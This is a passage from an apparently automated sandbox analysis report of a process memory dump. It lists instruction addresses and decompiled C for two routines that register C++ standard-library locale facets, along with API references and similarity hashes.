0x6d4811be
0x6d4811c5
0x6d4811ca
0x6d4811cc
0x6d4811d2
0x6d4811d5
0x6d4811db
0x6d4811de
0x6d4811de
0x6d4811de
0x6d4811e2
0x6d4811e8
0x6d4811eb
0x6d4811f7
0x6d48116f
0x6d48116f
0x6d481172
0x6d481176
0x6d48117a
0x6d481187
0x6d48118f
0x6d481191
0x00000000
0x6d481191
0x6d481158
0x6d481158
0x00000000
0x6d481158
0x6d481156
0x6d4810c9
0x6d4810c9
0x6d4810cc
0x6d4810d0
0x6d4810d4
0x6d4810e1
0x6d4810e9
0x6d4810eb
0x00000000
0x6d4810eb
0x6d4810b2
0x6d4810b2
0x00000000
0x6d4810b2
0x6d4810b0
0x6d481023
0x6d481023
0x6d481026
0x6d48102a
0x6d48102e
0x6d48103b
0x6d481043
0x6d481045
0x00000000
0x6d481045
0x6d48100c
0x6d48100c
0x00000000
0x6d48100c
0x6d48100a
0x6d480f7d
0x6d480f7d
0x6d480f80
0x6d480f84
0x6d480f88
0x6d480f95
0x6d480f9d
0x6d480f9f
0x00000000
0x6d480f9f
0x6d480f66
0x6d480f66
0x00000000
0x6d480f66
0x6d480f64
0x6d480ed7
0x6d480ed7
0x6d480eda
0x6d480ede
0x6d480ee2
0x6d480eef
0x6d480ef7
0x6d480ef9
0x00000000
0x6d480ef9
0x6d480ec0
0x6d480ec0
0x00000000
0x6d480ec0
0x6d480ebe
0x6d480e31
0x6d480e31
0x6d480e34
0x6d480e38
0x6d480e3c
0x6d480e49
0x6d480e51
0x6d480e53
0x00000000
0x6d480e53
0x6d480e1a
0x6d480e1a
0x00000000
0x6d480e1a
0x6d480e18

APIs

__EH_prolog3.LIBCMT ref: 6D480DE1
std::_Lockit::_Lockit.LIBCPMT ref: 6D480DEB

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D480E3C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480E5C
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480E7A

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 7e0ed97f5752c06d332e9295b5a2884c44a68ae6b0bcf3870ea8682a9719ee77
Instruction ID: 78d17f2754967a5607c9d52cba2232b9a4f0e6a02ab3608d9c84952614b99449
Opcode Fuzzy Hash: 7e0ed97f5752c06d332e9295b5a2884c44a68ae6b0bcf3870ea8682a9719ee77
Instruction Fuzzy Hash: E8119A7290422A9BCF15DBA5C884EFE7775AF85794F26040DE611AB390DF34DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CC38, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D48CC38(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;
				void* _t290;

				_t264 = __edx;
				_t203 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t286 - 0x14, 0);
				_t273 =  *0x6d53fe3c; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6D451D10();
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6D476A77(_t286 - 0x14);
					return E6D490E67(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6D48D2E5(__ebx, _t206, __edx, _t266, _t273, __eflags, _t290) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t286 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t266, _t273);
							E6D476A10(_t286 - 0x14, 0);
							_t274 =  *0x6d53fe40; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6D451D10();
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6D476A77(_t286 - 0x14);
								return E6D490E67(_t267);
							} else {
								__eflags = _t274;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6D48D34D(_t203, _t213, __edx, _t267, _t274, __eflags, _t290) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t286 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t203, _t267, _t274);
										E6D476A10(_t286 - 0x14, 0);
										_t275 =  *0x6d53fe48; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6D451D10();
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6D476A77(_t286 - 0x14);
											return E6D490E67(_t268);
										} else {
											__eflags = _t275;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6D48D3B5(_t203, _t220, __edx, _t268, _t275, __eflags, _t290) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t286 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t203, _t268, _t275);
													E6D476A10(_t286 - 0x14, 0);
													_t276 =  *0x6d53fe44; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6D451D10();
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6D476A77(_t286 - 0x14);
														return E6D490E67(_t269);
													} else {
														__eflags = _t276;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6D48D439(_t203, _t227, _t264, _t269, _t276, __eflags, _t290) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t203, _t269, _t276);
																E6D476A10(_t286 - 0x14, 0);
																_t277 =  *0x6d53fe4c; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6D451D10();
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6D476A77(_t286 - 0x14);
																	return E6D490E67(_t270);
																} else {
																	__eflags = _t277;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6D48D4BE(_t203, _t234, _t264, _t270, _t277, __eflags, _t290) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(0x14);
																			E6D490E9E(0x6d4fe9a2, _t203, _t270, _t277);
																			E6D476A10(_t286 - 0x14, 0);
																			_t278 =  *0x6d53fe50; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6D451D10();
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6D452140( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6D476A77(_t286 - 0x14);
																				return E6D490E67(_t271);
																			} else {
																				__eflags = _t278;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6D48D52A(_t203, _t241, _t264, _t271, _t278, __eflags, _t290) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D451940();
																						E6D4924F4(_t286 - 0x20, 0x6d5329cc);
																						asm("int3");
																						_push(4);
																						E6D490E9E(0x6d4fefbc, _t203, _t271, _t278);
																						_t279 = _t286 - 0x20;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_push( *((intOrPtr*)(_t286 + 8)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6d5044f4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6D48E2BD(_t203, _t286 - 0x20, _t264, _t271, _t279,  *_t91, _t290);
																						return E6D490E67(_t279);
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6D478A0B(__eflags, _t271);
																						 *0x6d5001e8();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6d53fe50 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6D478A0B(__eflags, _t270);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6d53fe4c = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6D478A0B(__eflags, _t269);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6d53fe44 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6D478A0B(__eflags, _t268);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6d53fe48 = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6D478A0B(__eflags, _t267);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6d53fe40 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6D478A0B(__eflags, _t266);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6d53fe3c = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6d48cc38
0x6d48cc38
0x6d48cc38
0x6d48cc3f
0x6d48cc49
0x6d48cc4e
0x6d48cc59
0x6d48cc5d
0x6d48cc60
0x6d48cc65
0x6d48cc69
0x6d48cc6e
0x6d48cc72
0x6d48ccb7
0x6d48ccba
0x6d48ccc6
0x6d48cc74
0x6d48cc76
0x6d48cc7c
0x6d48cc82
0x6d48cc8a
0x6d48cc8d
0x6d48ccca
0x6d48ccd8
0x6d48ccdd
0x6d48ccde
0x6d48cce5
0x6d48ccef
0x6d48ccf4
0x6d48ccff
0x6d48cd03
0x6d48cd06
0x6d48cd0b
0x6d48cd14
0x6d48cd16
0x6d48cd18
0x6d48cd5d
0x6d48cd60
0x6d48cd6c
0x6d48cd1a
0x6d48cd1a
0x6d48cd1c
0x6d48cd22
0x6d48cd28
0x6d48cd30
0x6d48cd33
0x6d48cd70
0x6d48cd7e
0x6d48cd83
0x6d48cd84
0x6d48cd8b
0x6d48cd95
0x6d48cd9a
0x6d48cda5
0x6d48cda9
0x6d48cdac
0x6d48cdb1
0x6d48cdba
0x6d48cdbc
0x6d48cdbe
0x6d48ce03
0x6d48ce06
0x6d48ce12
0x6d48cdc0
0x6d48cdc0
0x6d48cdc2
0x6d48cdc8
0x6d48cdce
0x6d48cdd6
0x6d48cdd9
0x6d48ce16
0x6d48ce24
0x6d48ce29
0x6d48ce2a
0x6d48ce31
0x6d48ce3b
0x6d48ce40
0x6d48ce4b
0x6d48ce4f
0x6d48ce52
0x6d48ce57
0x6d48ce60
0x6d48ce62
0x6d48ce64
0x6d48cea9
0x6d48ceac
0x6d48ceb8
0x6d48ce66
0x6d48ce66
0x6d48ce68
0x6d48ce6e
0x6d48ce74
0x6d48ce7c
0x6d48ce7f
0x6d48cebc
0x6d48ceca
0x6d48cecf
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf06
0x6d48cf08
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e
0x6d48ce81
0x6d48ce81
0x6d48ce84
0x6d48ce88
0x6d48ce8c
0x6d48ce99
0x6d48cea1
0x6d48cea3
0x00000000
0x6d48cea3
0x6d48ce6a
0x6d48ce6a
0x00000000
0x6d48ce6a
0x6d48ce68
0x6d48cddb
0x6d48cddb
0x6d48cdde
0x6d48cde2
0x6d48cde6
0x6d48cdf3
0x6d48cdfb
0x6d48cdfd
0x00000000
0x6d48cdfd
0x6d48cdc4
0x6d48cdc4
0x00000000
0x6d48cdc4
0x6d48cdc2
0x6d48cd35
0x6d48cd35
0x6d48cd38
0x6d48cd3c
0x6d48cd40
0x6d48cd4d
0x6d48cd55
0x6d48cd57
0x00000000
0x6d48cd57
0x6d48cd1e
0x6d48cd1e
0x00000000
0x6d48cd1e
0x6d48cd1c
0x6d48cc8f
0x6d48cc8f
0x6d48cc92
0x6d48cc96
0x6d48cc9a
0x6d48cca7
0x6d48ccaf
0x6d48ccb1
0x00000000
0x6d48ccb1
0x6d48cc78
0x6d48cc78
0x00000000
0x6d48cc78
0x6d48cc76

APIs

__EH_prolog3.LIBCMT ref: 6D48CC3F
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CC49

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CC9A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CCBA
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CCD8

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: e314f28ba01c9ed6fd584a92007fe521206b716032ba1e36dd1428275878db8c
Instruction ID: c3ad9c35b194fccf1a0c64262b013db24cb39f7004ce579877582aee004c65bd
Opcode Fuzzy Hash: e314f28ba01c9ed6fd584a92007fe521206b716032ba1e36dd1428275878db8c
Instruction Fuzzy Hash: 0A11A0329041298BCF04DBA5C840EFE7775AF85354F26050ED610AB391DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CCDE, Relevance: 7.6, APIs: 5, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6D48CCDE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;
				void* _t246;

				_t223 = __edx;
				_t172 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t242 - 0x14, 0);
				_t231 =  *0x6d53fe40; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6D451D10();
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6D476A77(_t242 - 0x14);
					return E6D490E67(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6D48D34D(__ebx, _t175, __edx, _t225, _t231, __eflags, _t246) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t242 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(0x14);
							E6D490E9E(0x6d4fe9a2, __ebx, _t225, _t231);
							E6D476A10(_t242 - 0x14, 0);
							_t232 =  *0x6d53fe48; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6D451D10();
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6D476A77(_t242 - 0x14);
								return E6D490E67(_t226);
							} else {
								__eflags = _t232;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6D48D3B5(_t172, _t182, __edx, _t226, _t232, __eflags, _t246) - 0xffffffff;
									if(__eflags == 0) {
										E6D451940();
										E6D4924F4(_t242 - 0x20, 0x6d5329cc);
										asm("int3");
										_push(0x14);
										E6D490E9E(0x6d4fe9a2, _t172, _t226, _t232);
										E6D476A10(_t242 - 0x14, 0);
										_t233 =  *0x6d53fe44; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6D451D10();
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6D476A77(_t242 - 0x14);
											return E6D490E67(_t227);
										} else {
											__eflags = _t233;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6D48D439(_t172, _t189, __edx, _t227, _t233, __eflags, _t246) - 0xffffffff;
												if(__eflags == 0) {
													E6D451940();
													E6D4924F4(_t242 - 0x20, 0x6d5329cc);
													asm("int3");
													_push(0x14);
													E6D490E9E(0x6d4fe9a2, _t172, _t227, _t233);
													E6D476A10(_t242 - 0x14, 0);
													_t234 =  *0x6d53fe4c; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6D451D10();
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6D476A77(_t242 - 0x14);
														return E6D490E67(_t228);
													} else {
														__eflags = _t234;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6D48D4BE(_t172, _t196, _t223, _t228, _t234, __eflags, _t246) - 0xffffffff;
															if(__eflags == 0) {
																E6D451940();
																E6D4924F4(_t242 - 0x20, 0x6d5329cc);
																asm("int3");
																_push(0x14);
																E6D490E9E(0x6d4fe9a2, _t172, _t228, _t234);
																E6D476A10(_t242 - 0x14, 0);
																_t235 =  *0x6d53fe50; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6D451D10();
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6D452140( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6D476A77(_t242 - 0x14);
																	return E6D490E67(_t229);
																} else {
																	__eflags = _t235;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6D48D52A(_t172, _t203, _t223, _t229, _t235, __eflags, _t246) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D451940();
																			E6D4924F4(_t242 - 0x20, 0x6d5329cc);
																			asm("int3");
																			_push(4);
																			E6D490E9E(0x6d4fefbc, _t172, _t229, _t235);
																			_t236 = _t242 - 0x20;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_push( *((intOrPtr*)(_t242 + 8)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6d5044f4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6D48E2BD(_t172, _t242 - 0x20, _t223, _t229, _t236,  *_t77, _t246);
																			return E6D490E67(_t236);
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6D478A0B(__eflags, _t229);
																			 *0x6d5001e8();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6d53fe50 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6D478A0B(__eflags, _t228);
																 *0x6d5001e8();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6d53fe4c = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6D478A0B(__eflags, _t227);
													 *0x6d5001e8();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6d53fe44 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6D478A0B(__eflags, _t226);
										 *0x6d5001e8();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6d53fe48 = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6D478A0B(__eflags, _t225);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6d53fe40 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6d48ccde
0x6d48ccde
0x6d48ccde
0x6d48cce5
0x6d48ccef
0x6d48ccf4
0x6d48ccff
0x6d48cd03
0x6d48cd06
0x6d48cd0b
0x6d48cd0f
0x6d48cd14
0x6d48cd18
0x6d48cd5d
0x6d48cd60
0x6d48cd6c
0x6d48cd1a
0x6d48cd1c
0x6d48cd22
0x6d48cd28
0x6d48cd30
0x6d48cd33
0x6d48cd70
0x6d48cd7e
0x6d48cd83
0x6d48cd84
0x6d48cd8b
0x6d48cd95
0x6d48cd9a
0x6d48cda5
0x6d48cda9
0x6d48cdac
0x6d48cdb1
0x6d48cdba
0x6d48cdbc
0x6d48cdbe
0x6d48ce03
0x6d48ce06
0x6d48ce12
0x6d48cdc0
0x6d48cdc0
0x6d48cdc2
0x6d48cdc8
0x6d48cdce
0x6d48cdd6
0x6d48cdd9
0x6d48ce16
0x6d48ce24
0x6d48ce29
0x6d48ce2a
0x6d48ce31
0x6d48ce3b
0x6d48ce40
0x6d48ce4b
0x6d48ce4f
0x6d48ce52
0x6d48ce57
0x6d48ce60
0x6d48ce62
0x6d48ce64
0x6d48cea9
0x6d48ceac
0x6d48ceb8
0x6d48ce66
0x6d48ce66
0x6d48ce68
0x6d48ce6e
0x6d48ce74
0x6d48ce7c
0x6d48ce7f
0x6d48cebc
0x6d48ceca
0x6d48cecf
0x6d48ced0
0x6d48ced7
0x6d48cee1
0x6d48cee6
0x6d48cef1
0x6d48cef5
0x6d48cef8
0x6d48cefd
0x6d48cf06
0x6d48cf08
0x6d48cf0a
0x6d48cf4f
0x6d48cf52
0x6d48cf5e
0x6d48cf0c
0x6d48cf0c
0x6d48cf0e
0x6d48cf14
0x6d48cf1a
0x6d48cf22
0x6d48cf25
0x6d48cf62
0x6d48cf70
0x6d48cf75
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfac
0x6d48cfae
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4
0x6d48cf27
0x6d48cf27
0x6d48cf2a
0x6d48cf2e
0x6d48cf32
0x6d48cf3f
0x6d48cf47
0x6d48cf49
0x00000000
0x6d48cf49
0x6d48cf10
0x6d48cf10
0x00000000
0x6d48cf10
0x6d48cf0e
0x6d48ce81
0x6d48ce81
0x6d48ce84
0x6d48ce88
0x6d48ce8c
0x6d48ce99
0x6d48cea1
0x6d48cea3
0x00000000
